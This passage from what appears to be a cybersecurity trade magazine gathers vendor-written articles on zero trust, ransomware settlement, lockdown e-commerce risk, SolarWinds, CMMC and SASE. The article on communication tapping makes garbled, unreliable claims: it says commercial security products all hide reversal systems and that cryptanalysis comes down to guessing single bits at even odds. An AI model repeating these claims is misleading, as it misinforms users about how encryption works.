Go into a modern software engineering organization and you will see many teams and activities being performed. To name a few: • Site Reliability Engineer (SRE) • DevOps • Apps & Services • QA/Test • Data Engineering • Data Analytics

Each team needs to be reviewed from a security perspective to determine what is the least privileged access that they need to perform their roles. Each needs their resources protected, their devices secured, and their identities validated. Once confirmed, they can perform their critical work. Safety first!

If only it were that easy. Each team has many similarities at a high level, but get into the details and their needs begin to diverge, often widely.

What is different about them?

Let's look at what's the same. They all have a wide assortment of 'things' they need to access that require protection. These 'things' include various TCP services (SSH), web apps and APIs (internally hosted or in the public cloud), SaaS, and oh yeah, throw in Kubernetes too.

The type of access each team needs is quite different. Perhaps your SRE needs access to production environments to see why a load balancer is misbehaving, but does the on-call developer supporting them also need this access? The DevOps team wants access to the build and development tools, such as the git and build servers, plus cloud environments, but should they have full access to production?

Another team, QA, needs to replicate issues found in production in production-like environments. They may need access to the hosts the services run on, or perhaps the databases themselves. But do they get access to the build tooling? What if the QA team is a subcontractor?

Each access decision requires discussion and design. What was previously one size fits all now works for none.

When thinking about the design, fine grain controls need to be implemented for each team, considering the sensitivity of the activity. Is production access needed, or is production data needed but not the rest of the infrastructure? The traditional hard boundaries of physical networks are now messy.

Let's look at a data engineering scenario. A production warehouse will have collection, aggregate, and analysis workloads. This might be implemented as a combination of cloud infrastructure, 3rd party SaaS tools, and internally-developed applications. When a new engineer is onboarded, security factors to consider with regard to access control include whether their device is compromised, or if their disk is encrypted or not. Do you want to allow the engineer do a pull of sensitive data onto such a device, not knowing the state of its security? Perhaps a better path is allowing them to access a reporting UI from a personal device, but no data-level queries can be run. That might be a good alignment of risk vs. task disruption.

Each team has its own ecosystem of tools, each with its own quirks. (It's all software built on software after all.) Each time a different remote access strategy is involved, the engineer gets frustrated as more security workarounds are deployed, making for an increasing fragile system that is more cumbersome to use. Want to eliminate shared passwords on that internally-hosted service that doesn't have SAML support? Want to make sure a particular API is accessed only by devices that are deemed secure?

Oh, and don't forget about handling contractor/third-party access. Or offshore teams. Or compliance…

Is it easy?

Is security easy? No. Is achieving “Zero Trust” easy? Certainly not at the boil-the-ocean level, but the good news is that a value-adding project with some sensible constraints is totally achievable. And doing so results in scalable identity-based access that factors in device health and security.

Step one is coming to grips with the challenge and deciding now is the time to take it on. Secure remote access platforms, like Banyan Security’s Zero Trust Remote Access Platform, exist that allow you to easily introduce zero trust, least privilege access in a consistent way across differing resources and heterogeneous infrastructure. Security dramatically improves. Usability, now consistent, becomes easy to the point of transparent.

My recommendation is to tackle a small project, perhaps just a few SSH hosts, maybe GitHub, or perhaps just getting better visibility into your devices. Understanding the challenge is the first step on the path and nothing beats a little hands-on prototyping.

About the Author Colin Rand is the Vice President of Engineering at Banyan Security. He has extensive experience in engineering leadership and product development working at a wide range of enterprise startups to late- stage and enterprise companies. Most recently Colin helped transform Delphix from an on-premise data management appliance to create their first SaaS offering with an integrated product strategy to create a hybrid platform. Before then, he led the platform initiative for Lookout, a BeyondCorp mobile security company, managing data, identity, and security services for ML-based mobile threat protection. Colin’s wide experience brought him through Salesforce, AKQA (creative agency) as well as his own startups in NYC. Colin began his career as a hands-on developer after studying computer engineering at the University of Michigan.

Cryptocurrency Ransomware Is on The Rise During COVID-19 – Here’s What Businesses of All Sizes Need to Know About Dealing with Attacks By Marc Grens, Co-Founder & President at DigitalMint

Crypto-related ransomware attacks are on the rise, and the pandemic has only hastened its propagation. For example, from 2018 to 2020, ransomware attacks have increased by 200%. Yet during the COVID- 19 pandemic alone, from January to May of 2020, ransomware attacks have grown by 900%. This is not surprising with the rise and vulnerabilities of remote work and individuals mixing their professional and personal lives online. Ransomware is a common cybersecurity threat facing a wide variety of industries, from public entities like government agencies and healthcare organizations, where confidential data storage is critical, to

financial services and even manufacturing. Worse yet, a federal cybersecurity advisory committee has warned of an increased cybersecurity threat to hospitals even while dealing with the pandemic.

These types of attacks do not discriminate based on company size either. Small and mid-size businesses are at as much risk as large companies. And it is all only going to get worse in 2021 as technology continues to improve and advance. Hackers have become more emboldened and brazen, and unfortunately, some businesses continue to lag behind in cybersecurity precautions. Based on all this information, it is worth considering what steps leaders can take to deal with crypto-related ransomware attacks.

Cryptocurrency Ransomware Attacks: What You Can—and Should—Do

There are some steps you can take to either avoid a ransomware attack or, at the least, handle it with minimum damage to your company’s reputation, data, and fiscal health.

1. Train and educate employees about ransomware and how to avoid it—If your IT Department does not already have a set of cybersecurity training modules in place, consider building out a comprehensive program to educate employees about ransomware. Be sure to update the program regularly, as new developments in cybersecurity are rapid. In addition, stress to all your employees how serious ransomware can be.

2. Know that paying the ransom is a last-resort option—While there are plenty of ways to recover losses and deal with the ransom, such as employing companies like DigitalMint, who have used their cryptocurrency and financial networks to help them settle cases with ransoms as high as more than $10 million in the past, you should know that in general, paying the actual ransom is the last resort. You should not immediately pay it without considering your other options and seeking professional technical advice to determine the damage that may have been done

3. Hire a reputable cyber incident response firm with technical expertise —Once attacked by ransomware, remain calm and hire a reputable cyber incident response firm. They need to analyze the situation, assess the damage, understand how much data has been released, and advise you on how to proceed. This will not only include determining a strategy for handling the current ransomware issue, but it also will include remedying vulnerabilities in your system to prevent future attacks.

4. Avoid conflicts of interest—This is very important, possibly the most important point: avoid conflicts of interest, especially when dealing with the cryptocurrency ransom itself. There should be a clear separation of the cyber incident response firm and cyber settlement financial services organization that acquires the cryptocurrency. It would be best if you chose a separate partner for each role in the process because a cyber incident response firm that also deals with the financial payment side of things might have a conflict of interest that prevents them from doing the best job for you possible under the circumstances.

For instance, perhaps the cyber incident response firm knows how to get your data back without paying the ransom; if that consultant also handles your business's potential cyber settlement cryptocurrency purchase, why would they want to stop at the cybersecurity consultation step in the process if they are incentivized to purchase your settlement? Instead of solving the problem early in the process without a ransom payment, your consultant might be tempted to proceed with payment to receive an extra

commission from you. That is why companies like DigitalMint focus solely on cyber settlement financial services, removing any conflict of interest.

5. Prevent financial red-flags in cryptocurrency transactions—In many cases, especially with small and mid-size businesses, fast and large cryptocurrency transactions can be seen as suspicious by regulatory authorities and financial institutions. For that reason, you must prevent red-flags with your transactions. Doing this includes:

● Banking transparency with settlements—Make sure your cyber cryptocurrency settlement partner company is transparent about its transactions and has a history of always rigorously recording documentation of all cryptocurrency transactions.

● Strong relationship with banks and firms who deal with cryptocurrency—Many smaller cryptocurrency settlement companies do not have partnerships with organizations that specialize or even deal in cryptocurrency. This is why your cyber settlement partner must already have those strong relationships with organizations that handle cryptocurrency transactions.

● Strong AML (Anti-Money Laundering) and other stringent compliance programs—Your cyber cryptocurrency settlement partner must always comply with AML, OFAC, and other federal and state regulatory guidelines. Since you are dealing with hackers, it can be easy to avoid compliant transactions, but if your cyber settlement partner is in compliance with the Anti-Money Laundering Program and other compliance programs, you will not be prone to sink to the hackers’ levels of unlawful behavior.

The Takeaway: Ransomware Does Not Have to Be the End of Your Company

While it is true that the growing threat of ransomware attacks continues to increase rapidly in the age of the COVID-19 pandemic—and has been spiking at an alarming rate even prior to the pandemic, there are still some relatively simple steps you can take to prevent or minimize the damage to your company. However, if you choose to hire a trusted independent cyber incident response firm, ensure any conflicts of interest are mitigated or fully disclosed.

About the Author Marc Grens is the Co-Founder & President of DigitalMint, a trusted cryptocurrency ransomware resolution provider that enables clients to purchase Bitcoin and other cryptocurrencies to settle ransomware incidents. He is a serial entrepreneur with more than 15 years of experience in the investment industry. Prior to DigitalMint, Grens held senior positions at Charles Schwab, HighTower Advisors, and Alpha Strategies. He received his M.B.A. from the Kellstadt Graduate School of Business at DePaul University in 2010, and a B.A. from Illinois State University. Grens is an active angel investor and serves on multiple advisory boards of companies in the Chicago tech community. Marc Grens can be reached at www.digitalmint.io.

E-Commerce and Lockdown: The Perfect Storm for Cyber Threats The impact of lockdowns on cybersecurity By Aman Johal, Lawyer and Director of Your Lawyers

The UK’s National Cyber Security Centre (NCSC) reported that a quarter of all cyberattacks over the past year are linked to the pandemic. Action Fraud, the UK’s National Fraud and Cybercrime Reporting Centre, disclosed that there have been over 16,300 successful cyber scams with losses amounting to £16.6m during the first lockdown period alone.

Research also revealed that 86% of consumers experienced some form of cybercrime during the pandemic as retailers turn to increased e-commerce out of necessity. Action Fraud found that people aged 18-26 were the most vulnerable to cybercrime on online shopping platforms, such as Depop and eBay, representing 24% of victims.

The second national lockdown in November pushed the nation back online for four more weeks, which served to increase cybersecurity risks once more. Black Friday, which took place on 27thNovember, was an additional factor, and phishing attacks reportedly increased by 336% when compared to previous years. In 2020, visits to e-retailers were up 35% year on year, inevitably correlating with a surge in cyberattacks and the risks that they pose.

And that is not the end of it. With the Christmas shopping season in full swing, further data has revealed that less than half of UK retailers feel that they have adequate cybersecurity measures in place. 45% believe that their third-party partners are not prepared either, a matter that has been a point of contention in the Ticketmaster data breach which involved a third-party vulnerability and exposed the personal information of 1.5 million UK customers.

The threat is so severe that the NCSC has launched its Cyber Aware campaign in December to educate consumers and businesses alike about the online threat posed during the festive season. These cumulative factors are indeed a significant cause for concern. The lack of urgency in retailers and consumers to protect themselves against cyber threats, in addition to the increasing sophistication of hackers already boasting a wealth of practice from the first lockdown, has created a ticking time bomb.

Data breach: the straw that could break the camel’s back

It is critical that e-retailers deliver on their responsibility to protect customer data. Failure to do so could result in significant legal and financial repercussions.

The UK’s Information Commissioner’s Office (ICO) has the power to issue significant fines for data breaches in accordance with the GDPR. In October 2020, it issued its first two significant fines against British Airways (BA) and Marriott, at £20million and £18.4million respectively – although these figures do represent a disappointing climb-down from the original intention to fine in the sums of £183m and £99m. In addition to fines, businesses in breach of the GDPR may also face significant compensation pay-outs for damages. In the case of BA, they could be facing a total pay-out of as much as £3 billion based on an average possible claim of £6,000 for each of the estimated 500,000 victims.

Customer loyalty is also likely to take a hit following a cyberattack; an additional blow that the retail sector cannot afford to suffer in 2020. For the UK retail sector as a whole, sales decreased by 19.1% year on year during the first lockdown, and it is still struggling to recover. Cybersecurity must always be a financial priority for e-commerce platforms, as data breaches can cost far more on average than investment in preventative measures.

Despite a dismal outlook for the retail industry on the whole, consumers who are affected by a data breach this festive season should remember that they could be entitled to pursue compensation from the responsible party. The power of the law should act as an important deterrent for businesses adopting a complacent attitude towards their cybersecurity responsibilities, especially as we continue to see worryingly high numbers of cyberattacks with serious implications for millions of people in the UK.

The surge in cybercrime is unlikely to relent in the near future. With a looming recession predicted for 2021, businesses may be persuaded to cut their cybersecurity spending. It is essential that this does not happen: companies in the e-commerce sector, and beyond, must view cybersecurity as a non-negotiable asset.

About the Author Aman Johal, Lawyer and Director of Your Lawyers Aman founded consumer action law firm Your Lawyers in 2006, and over the last decade he has grown Your Lawyers into a highly profitable litigation firm. Your Lawyers is a firm which is determined to fight on behalf of Claimants and to pursue cases until the best possible outcomes are reached. They have been appointed Steering Committee positions by the High Court of Justice against big corporations like British Airways - the first GDPR GLO - as well as the Volkswagen diesel emissions scandal, which is set to be the biggest consumer action ever seen in England and Wales. Aman has also has successfully recovered millions of pounds for a number of complex personal injury and clinical negligence claims through to settlement, including over £1.2m in damages for claimants in the PIP Breast Implant scandal. Aman has also been at the forefront of the new and developing area of law of compensation claims for breaches of the Data Protection Act, including the 56 Dean Street Clinic data leak and the Ticketmaster breach. Aman can be reached online at LinkedIn and at our company website: https://www.yourlawyers.co.uk/

Communication Streaming Challenges By Milica D. Djekic

As it’s well-known, there are a lot of ways of tracking someone’s e-mail, chat or social media accounts. The defense professionals are quite familiar with such methods and those hotspots could be used in order to discover the new suspicious activities in cyberspace. So many transnational and terrorist groups use account tracking to stay updated about someone’s actions in the virtual domain. The main trick with the network traffic is that the data are put into packets keeping so sensitive information about the payload and routing information. In other words, those packets can travel from device to device relying on so critical communications infrastructure. If computer breach and account tracking are well-known ways of obtaining the sensitive content, it’s quite clear there are more critical points in the data exchange and storage. For instance, if anyone would want to avoid the challenges of servers, datacenters and endpoints breaches that person could try to do some communications tracking in order to catch the information on their way on. In so many cases those contents are under the key and there must be invested some effort in order to decrypt the message and make it being readable to everyone. In the modern time, so many communications channels have begun their life path as defense products and today they are fully under the commercial usage. Anything being widely accessible has the counter-system in order to remain under the control of its creators. Apparently, no one will develop the solution that works on its own and without being controllable by human beings. Next, the final product can do only what its developers defined it to do and it cannot cope without its secret counter-weapon. So, if the e-mail accounts, browsers and social media profiles deal with some kind of protection and they are so appealingly commercialized, it’s quite

obvious those advancements have the reversible systems that make them being manageable. The similar situation is with the communications routes that can be tracked using the widespread monitoring tools. Even if the packets of their information are well secured they can be transformed into the plaintext as there are a plenty of options on the marketplace for such a purpose.

The devices in network communicate with each other coping with the certain set of rules. First, it’s important to understand why communication protocols matter as they are from the crucial significance for the traffic enabling and information exchange. In other words, if two devices follow such rules and if their talk is accurate or as defined they will get a permission to make a connection with one another and do some data transfer. Logically, those information are the part of the communication channel and in both – policing and military – there can be an advisory who can listen to the traffic and re-direct its samples to the other machines. We call that operation tapping or streaming. Further, the exchanged information are secured with some sort of cryptography and the streamer cannot be confident what all that is about. The point is someone can make a breach into the network traffic as it’s possible making a breach into some device. On the other hand, when the traffic is streamed there can be a lot of job for cryptanalyst that needs to decrypt and analyze once sent content. From a security point of view, this matters for a reason communication tracking can be used by the illegal organizations in order to monitor someone’s activities on the web. As the consequence of such a campaign we can realize that so many community members as well as their infrastructure can be under the risk because the bad guys can come into the possession of the confidential information. Across the globe, there are so many network monitoring applications that can be applied to do some streaming and with the support of some cryptanalysis efforts reading once decrypted messages. Basically, the cryptanalyst is a person who is capable to transform the packets of the information into their plaintext form and make them being accessible to the rest of the team members. The fact is the cybercrime underworld has always been in position to do such a sort of the operations and undoubtedly is the threat to communities, businesses and government assets. It appears the high- tech syndicates are the real global threat especially if we have in mind, they can be a very dangerous weapon in the hands of the rest of criminal and terrorist groups.

The packet of the information is so complex set of the bits that depending on the 0s and 1s position in the array can mean a lot in the machine language sense. The two basic parts of the data packet are the payload and routing information that respectively cope with the message itself and the tracking path the packet must pass in order to be delivered from the starting point unless the final destination. The common type of the cryptography is end-to-end encryption or E2EE, so far. That kind of encryption means that the main message is ciphered at one device, then packed into the payload bits and finally sent to the destinating location. The entire communication network is so huge and very complicated, so in order to make the data transmission it’s necessary to get along with some path and prevent the encrypted payload getting streamed and read from its traffic route. The routing information or the path bits serve for the better packets distribution across the network. The E2EE is one of the best practice approaches in so many competitive armies and policing units as it serves for the quite reliable delivery of the messages. That sort of cryptography as anything else has its strong and weak sides and as it’s well-known the message is encrypted at the initial device and decrypted at the final destination, which means if those two devices are under the exposure the enemy can come in the possession of the accurate plaintext. Also, if anyone is doing the channeling of the communication asset that person can figure out the accurate interpretation of the payload itself. In other words, for the purposes of the good cryptanalysis it’s important to deal with the advanced knowledge of computer science and engineering and whatever goes through the channel deals with the array of the packet’s bits. If we know the position of each bit in that array we can make a choice between the 0 and 1, so – in other words, our chances to make the true guessing are half-half. In addition, it’s significant to take into consideration the meaning of ASCII characters that can give an opportunity to figure out how the open message could look like. For instance, any sentence within

the plaintext ends up with some sign of interpunction, so there can be the entire variations of the possible decrypted information. In other words, as the E2EE is critical at its endpoints it can be quite concerning on its way through from the source to destination as the channel can be tapped and potentially broken in. In order to illustrate the link encryption, we can use an example of the highway with its entire infrastructure that serves in directing the traffic on. The driver on that road must know where he goes and he has the permission to rely on the traffic signalization. In other words, the usage of the maps and GPS navigation is allowed, but what those all if the driver does not know the pathway. It seems that the link encryption is more like sending the packet of the information through the well-protected channel which routing information bits are carefully encrypted. The only fining being available at that moment is the information about the next stop. So, if it is needed to apply some GPS navigation it’s necessary to go step-by-step. In other words, stop linkage information is included as the plaintext and reading so it’s possible to figure out where the next station to such a packet is. In so general terms, those stops can be considered as hops where the entire packet is decrypted and re-encrypted in order to obtain the information about where further the packet should be delivered. The best practice has suggested that the most useful solution is the combination of the E2EE and link encryption for a reason the both – payload and routing information – are well-protected. That sort of cryptography is known as the super-encryption. The hop is any device in the network where once directed traffic can go and it can be the router, modem or server. The hop is also so sensitive point in the network because the hackers can identify that part of the IT infrastructure and try to attack the place where decryption of the packet itself takes place. That is especially the huge risk in case of the network monitoring for a reason the bad guys can find and exploit the places where the plaintext is widely accessible. In other words, the ongoing cyber criminals are extremely skillful individuals with the exceptional technical brightness that are capable to discover any weakness in the system and take advantage over so. The mix of the E2EE and link encryption gives the safer environment for data transport, but it’s still vulnerable to the high-tech attacks and campaigns.

About the Author Milica D. Djekic is an Independent Researcher from Subotica, the Republic of Serbia. She received her engineering background from the Faculty of Mechanical Engineering, University of Belgrade. She writes for some domestic and overseas presses and she is also the author of the book “The Internet of Things: Concept, Applications and Security” being published in 2017 with the Lambert Academic Publishing. Milica is also a speaker with the BrightTALK expert’s channel. She is the member of an ASIS International since 2017 and contributor to the Australian Cyber Security Magazine since 2018. Milica's research efforts are recognized with Computer Emergency Response Team for the European Union (CERT-EU), Censys Press, BU-CERT UK and EASA European Centre for Cybersecurity in Aviation (ECCSA). Her fields of interests are cyber defense, technology and business. Milica is a person with disability.

Anatomy of a hack – Solar Winds Orion Nation State hacks major IS Software vender By James Gorman, CISO, Authx

What happened when one of the leading IT support venders in the world, leading government agencies the world over and up 18,000-33,0001 companies running the affected version (2019.4 HF 5 and 2020.2 with no hotfix or 2020.2 HF 1)2 of SolarWinds Orion software.

What happened. 1) The threat actor – indicated to be a nation state in Microsoft’s Threat Intelligence Center’s release3 - was able to compromise the update process for Solar Winds and imbed a trojan horse that allowed the attacker to gain administrative access to the network. 2) Using the acquired administrative access the intruder used a lateral attack to gain access to the certificate signing credentials of the organization. This allows the attacker to generate “real- looking” credentials to continue to move throughout the organization. 3) Using the now trusted yet hacked credentials, the attacker then takes stock of what else they have access to in the organization, on-premise and cloud based. This is because they have access to seemingly valid credentials and are not flagging most alerts looking for unusual login failures. 4) Once the attacker has access to a Global Administrator’s account or its trusted certificate, they use that to impersonate the admin, they essentially have the keys to the kingdom and can

1 https://www.sec.gov/ix?doc=/Archives/edgar/data/1739942/000162828020017451/swi-20201214.htm

2 https://www.solarwinds.com/securityadvisory 3 https://blogs.microsoft.com/on-the-issues/2020/12/13/customers-protect-nation-state-cyberattacks/

create new global admins, add them to existing services and or create new services and then go after API access to the organization.

What has been reported is that once this particular hacker gets access to the global administrator they keep the malicious programs – Malware - to a minimum and used remote access to move through the enterprises and take over code repositories, trade secrets, MS Office 360, Azure Active Directory, essentially every system that relies on federated access and authentication. The list keeps growing of who was hacked and it is a veritable who’s who of what a Nation State actor would want – US State Department, Pentagon, Department of Homeland Security, National institute of Health and others, as well as many private firms4. While many of the known targets are the “big guys” if you use Solar Winds Orion assume you are compromised.

If you use Solar winds Orion assume you are compromised, take it off line, upgrade and contact SolarWinds. https://www.solarwinds.com/securityadvisory

If you are a CISO or security professional, you should know that in this hack you could do everything right and still have been vulnerable. You could have anti-malware tools running, login restrictions on sensitive systems, monitoring of the failures, all the things you would do in a traditional defense in depth environment. Because you trusted your supply chain and one of the largest and most trusted names in network monitoring and management was breached and you are now vulnerable and probably compromised.

You could have done everything right and still been compromised! This is the lesson to learn here all you can do is mitigate and minimize the damage done. Some hackers are very, very good and your security is only as good as your weakest link in your supply chain. It could be one of your largest and most trusted IT suppliers that are the avenue of attack. You have to trust and verify everyone.

So what is a person to do if they are or are not compromised? There are some things that had they been in place cold have mitigated or limited the damage due to the internal spread of this particular hack. We still do not know how the development/release system at SolarWinds was compromised – I for one am looking forward to seeing how that happened.

What to do now that we know what we know –

1) Update your software frequently – this is still the best way to keep known vulnerabilities at bay. Don’t let this supply chain hack scare you into not keeping your systems up to date. It is one of the most basic principals in Cybersecurity – path your systems 2) Use updated antivirus systems that are quickly updated to mitigate this attack.

4 https://news.yahoo.com/solarwinds-orion-more-us-government-131005599.html

3) Monitor your network and systems for anomalous behavior – Look for multiple power shell access to Active Directory from the same machine. Especially privileged sign ins.5 4) Look for adds to your federated services, use best practices for securing your AD FS services.6 5) Use whitelists for access to your sensitive network segments – block outbound traffic except what is needed for vital business processes on your trust segments. This blocks the trojans access to its home Command and Control (C2) servers where the hackers then get access to your environment. 6) Use hardware based tokens (HSMs) for SAML signatures. 7) Alert and verify as authorized new access credentials on OAuth applications and 8) Reduce attack surface by removing applications and service principals that are not needed on your systems. Make sure you are logging the service principal access and look for anomalies. 9) Use multifactor authentication with Biometric factors for all log ins.

Authx https://authx.com is a prime example of how to verify who actually has access to your systems. It is a multifactor authentication mechanism that uses biometrics – face, finger, palm or one-time pad to give additional validity to the user access experience. Authx or another would have limited the ability for lateral movement and the persistence of this or most imposter credential attacks.

About the Author James Gorman CISO, Authx James is a solutions-driven, results-focused technologist and entrepreneur with experience securing, designing, building, deploying and maintaining large-scale, mission-critical applications and networks. Over the last 15 years he has lead teams through multiple NIST, ISO, PCI, and HITRUST compliance audits. As a consultant, he has helped multiple companies formulate their strategy for compliance and infrastructure scalability. His previous leadership roles include CISO, VP of Network Operations & Engineering, CTO, VP of Operations, Founder & Principal Consultant, Vice President and CEO at companies such as GE, Epoch Internet, NETtel, Cable and Wireless, SecureNet, and Transaction Network Services. James can be reached online at ([email protected], https://www.linkedin.com/in/jamesgorman/ , etc..) and at our company website https://authx.com

5 https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/concept-all-sign-ins 6 https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/best-practices-securing-ad-fs

Cybersecurity Maturity Model Certification (CMMC) It is not about compliance, or is it? By Carter Schoenberg, CISSP & CMMC Registered Practitioner Vice President – Cybersecurity SoundWay Consulting, Inc.

As of the date of this publication, new requirements for U.S. Defense Contractors are in play. The days of taking an approach addressing cybersecurity requirements in the form of, “it doesn’t apply to me” are officially over. In case you missed it, there are four letters that should have you standing up and taking notice (CMMC). To start with, what exactly is CMMC? The Cybersecurity Maturity Model Certification (aka CMMC) is a new and comprehensive framework that will dictate future awards made by the U.S. Department of Defense. This framework is managed by a non-government entity known as the CMMC Accreditation Body (AB) and fully supported by the highest levels of the U.S Department of Defense (DOD) Leadership.

Starting back in 2017, requirements to meet 110 security controls described in the National Institute of Standards and Technology Special Publication 800-171 “Protecting Controlled Unclassified Information in Non-Federal Systems and Organizations” were included in formal solicitations under the Defense

Federal Acquisition Regulation (DFAR). Unfortunately, procurement officials generally highlighted this requirement with a single sentence in solicitations and relied upon self-attestation. Since that time, the F35 Strike Fighter technical designs, Naval defensive electronics on sea vessels, and arguably the largest release of malware created for offensive operations by the National Security Agency have all been compromised due to poor cyber hygiene by U.S. Government Contractors (GovCons).

Regardless if we like it or not, the U.S. Government is justified in taking the position “enough is enough” and now forcing all, let me say that again,…”ALL” GovCons seeking work with the DOD to demonstrate adequate cyber hygiene. These efforts are spearheaded by Ms. Katie Arrington. As described by Ms. Arrington, the Government is taking a crawl, walk, run approach towards formal implementation of CMMC. CMMC has five levels of maturity starting with Maturity Level 1 equating to being able to demonstrate 17 practices (security safeguards) are implemented. Starting around June 2021, it is estimated 15 contracts will be issued impacting 1500 GovCons and this will ramp up to all engagements no later than FY2026. This is all contingent upon formal adoption within the DFAR.

To make matters even more interesting is that the interim DFAR ruling explicitly states as of December 1, 2020, a large number of GovCons have to immediately report their current status towards conforming with NIST SP:800-171 to the Government. If the level of accuracy for self-attestations seen previously is any indicator, there is a likelihood that GovCons may be inclined to fudge the results because who at the Defense Department is really going to police the results, right? WRONG! Misrepresenting the results has two significant consequences. One adverse consequence is defined by industry stakeholders and one is being overlooked. The first is what is known as a False Claims Act. This is actually a criminal investigation under the direction of the Justice Department and targets individuals (CEOs, Boards of Directors). The second is under the Federal Trade Commission (FTC) as a TITLE 15 violation for an unfair and deceptive business practice and can result in heavy financial sanctions.

The Government is socializing their goal is not to make a compliance mandate but rather to foster the adoption of actual cybersecurity best practices in a way that enhances the GovCon. Regardless if you are Maturity Level 1 or even Level 5, two forms of objective evidence will be required for proof of adoption of the practices and processes defined within CMMC. Sounds a lot like a compliance initiative. Instead of using the term “audit” the term “assessment” is the CMMC nomenclature.

If you have been through a FISMA, CMMI, ISO, PCI or other audit where objective evidence is required for proof of meeting the standard, this exercise is academically no different. There is one caveat to that. Once Maturity Level 3 is applicable (GovCon receives or creates CUI), then simply having safeguarding controls and appropriate policies & procedures is not enough. It is incumbent on the GovCon to demonstrate they are all “managed”. What does that mean though? Think of it as “operationalizing” these

best practices into your core business daily operations. From here, you advance to Maturity Level 4, requiring everything from Levels 1-3 plus being able to demonstrate everything is “Reviewed” at least annually. Then at Maturity Level 5, you must be able to demonstrate your organization is optimizing the aforementioned practices and processes.

If you are already ISO 27001 certified, congratulations – it is no longer enough. If you are CMMI Level 3 Certified, congratulations – it too is no longer enough. What about FedRAMP? That too is no longer enough.

To date, the DOD is stating that having your formal certification is not required to bid, just required at time of award. The Government and the CMMC-AB estimate you should allow yourself a 6-month window to prepare for Maturity Level 3 and higher. Having performed almost 40 of these types of assessments for Government and Industry, GovCons would be wise to project an 8 to 10-month runway. These presumptions are also problematic because the average award timeline is approximately 120 calendar days. Even if the 6-month preparation estimate is correct, that still leaves a delta of two months. This essentially means a failure to have certification prior to submitting your proposal for Maturity Level 3 and higher will likely result in somebody else receiving the award.

For GovCons that are micro-size entities with home-based offices, you should consider the strong likelihood that your home will actually be inspected even at Maturity Level 1. For more details on what assessors will look for, please click here.

It is important to note that if you are a GovCon you should: • Take immediate steps towards CMMC preparation at Maturity Level 1 with an understanding you may likely be required for Level 3 rating within a year or so. • Carefully review the specifications of the requirements in CMMC. • Do not take the position of believing you are in good shape because your IT guy told you so. • Do not take the position this framework will go away with the new administration. • Do seek out Registered Provider Organizations that have licensed Registered Practitioners authorized by the CMMC Accreditation Body. • Understand this framework is a work in progress and will continue to evolve as the cyber threat landscape evolves. One last noteworthy point is that there are a number of industry stakeholders continuously trying to find fault with the CMMC-AB and Ms. Arrington. Taking this approach is like waving at the train when it has already left the station. ALL ABOARD!

About the Author Carter Schoenberg is the Vice President of Cybersecurity at SoundWay Consulting. Carter has over 20 years’ experience supporting Government and Industry stakeholders and is a subject matter expert on the Cybersecurity Maturity Model Certification (CMMC), cyber investment strategies, reducing organizational exposure to harm by cyber liabilities. His work products have been used by DHS, DOD, NIST, and the ISAC communities. Carter can be reached online at [email protected] and through www.soundwayconsulting.com or the CMMC Marketplace

Businesses Should See Security as An Enabler of Digital Transformation, Not A Hindrance A distributed workforce has renewed the importance of security for all aspects of organizations’ technology estates

By Matt Gyde, CEO, Security Division at NTT Ltd.

The pandemic has put a spotlight on cybersecurity issues as businesses have moved to a distributed workforce model. Many businesses found it difficult to move with agility to provide employees with the devices and network infrastructure needed to operate and communicate seamlessly when COVID-19 first hit.

In fact, according to NTT’s 2020 Intelligent Workplace Report ‘Shaping Employee Experiences for a World Transformed’, in many cases, employees have been left to use their personal devices and applications, increasing the risk of security vulnerabilities. Additionally, only 46.4% of global businesses surveyed for the same report claimed they increased their IT security capabilities to keep their organization and employees secure.

The rise in nefarious threats during the pandemic is clearly outlined in NTT’s Global Threat Intelligence report as hackers seek to exploit the coronavirus-related panic. Attacks have included information- stealing malware built into a fake World Health Organization (WHO) information app, while phishing emails have offered in-demand items including face masks, hand sanitizer and Coronavirus tests. These were so bad that the World Health Organization (WHO) called it an “infodemic.”

Secure by design approach crucial for businesses to protect themselves

Unfortunately, just like the COVID-19 virus itself, cybercriminals and spies aren’t becoming fatigued by its impact on our personal and professional freedoms and prospects, as many of us are. Threat actors and organizations are opportunistic and both well-organized and funded enough to ramp up their nefarious activities despite the current worldwide crisis.

This has, in turn, spawned renewed acknowledgment of the importance of security being embedded in all aspects of organizations’ technology estates. Whether applications and workloads are running on- premises or in a public or private cloud and, irrespective of whether people are working from home, the office, or remotely, infrastructure needs to be inherently secure by design and entrenched into every aspect of a business’s environment. Security cannot be ‘bolted on’ as an afterthought because it impacts both the customer and employee experience.

Perhaps many organizations have not embedded security in their organization because they see security as a hindrance and not a driver of digital enablement. A cultural mind-set shift needs to happen. Security helps businesses to deliver transformational technology that enables the best user experience. And it is intrinsically linked to the protection of employee data.

Digital transformation with SASE

At NTT, we predict in our ‘Future Disrupted: 2021’ report that the concept of ‘secure access service edge’ (SASE), a term coined by Gartner, is going to be a mainstream trend in the next 12 months. SASE focuses on achieving the best end-user experience in an increasingly SaaS and software-defined network paradigm, securing APIs and capitalizing on ‘as-a-service’ scenarios such as firewall-as-a-service or CASB-as-a-service.

In order to start with SASE, businesses will need to truly assess what, and which assets, they need to protect, where distributed workloads are running, how their business consumes applications and ensure infrastructure is fit for purpose: • Assess what, and which assets businesses need to protect: To start, businesses should look at data protection. They’ll need to pinpoint exactly what they absolutely have to protect and decipher what is ‘crown jewels’ data and information versus what’s not. Then they can return to the basics: good operations hygiene and due diligence • Understand where various workloads are running: This will mean businesses should look at implementing appropriate firewalls and micro-segmentation • Consider applications and how they’re being consumed: Importantly, businesses should ask themselves how these consumption trends tie back to the platform strategy and related end- user/customer and end-point protocols and how are they interacting with various workloads and applications • ‘Dust-off’ existing network and application security strategies: Businesses should ensure that their security strategies are still fit-for-purpose. This will likely include making decisions about their path to SD-WAN adoption

Ultimately, businesses must ensure that cybersecurity protects internal operations and employee data, as well as its customers. Today, this means that simply buying ‘point’ security is no longer a viable approach – it needs to be baked into system design.

Businesses must increasingly focus on ensuring that cybersecurity is an enabler, not a hindrance, to digital transformation and use the right frameworks and partnerships within the ecosystem to do so. There is no more important time than now for the industry to come together to mount a powerful defence against an ever-mounting and ever-evolving cyber threat.

About the Author Matt Gyde is the President and Chief Executive Officer, Security Division at NTT Ltd. He is leading the security strategy, services and go-to-market execution to build the world’s most recognized security business. Matt can be reached via his LinkedIn profile at: https://www.linkedin.com/in/matt-gyde/ and at https://hello.global.ntt.

Asset Management, The Weakest Link in Cybersecurity Risk By Gyan Prakash, Head of Cyber Security / Security Engineering, Altimetrik Corp

